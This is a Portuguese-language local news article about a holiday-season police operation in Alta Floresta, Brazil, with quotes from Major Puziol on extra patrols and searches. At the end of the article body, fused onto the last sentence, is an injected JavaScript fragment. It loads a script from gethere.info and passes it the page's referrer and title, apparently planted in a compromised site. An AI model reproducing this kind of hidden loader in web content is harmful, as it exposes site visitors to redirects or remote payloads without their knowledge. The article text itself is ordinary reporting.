Capa / Cidades / Operação integrada em Alta Floresta começa neste sábado

Operação integrada em Alta Floresta começa neste sábado

100_2387As forças de segurança pública iniciarão neste sábado. 19,  a operação denominada “Impacto”. A operação integrada com o objetivo de combater a criminalidade, o tráfico de drogas, garantindo um final de ano mais tranquilo e seguro para a população.

Segundo o Major Puziol para a realização da operação será necessário reforçar o número de polícias.  “Terá um aumento expressivo do efetivo, a gente quase que dobra, e alguns dias até triplica o efetivo nas ruas em determinados horários”, relatou.

A Operação Impacto contará com o auxilio da Polícia Civil, Guarda Municipal, Bombeiros Militares e auxílio do Exército. Blitz, arrastões, checagem e buscas serão feitas. “A gente trabalha na letra ABC, que é abordagem, busca e checagem, então inclui tudo é revista veicular, de pessoas, em bares, residências se tiver algum mandado de busca determinado pela justiça, tudo que aparecer nós estaremos realizando” afirmou o Major.

As operações iniciam neste sábado, 19, e se estendem até no dia 02 de janeiro, em dias e horários alternados. “Nos dias que a gente detecta que possui o maior número de ocorrências, gente incrementa neste momento o efetivo maior e faz a saturação daquele período e aguarda para ver se há mudanças e se houver a gente muda o horário também e os dias de operação”, pontuou Puziol.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre Kariny Santos

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top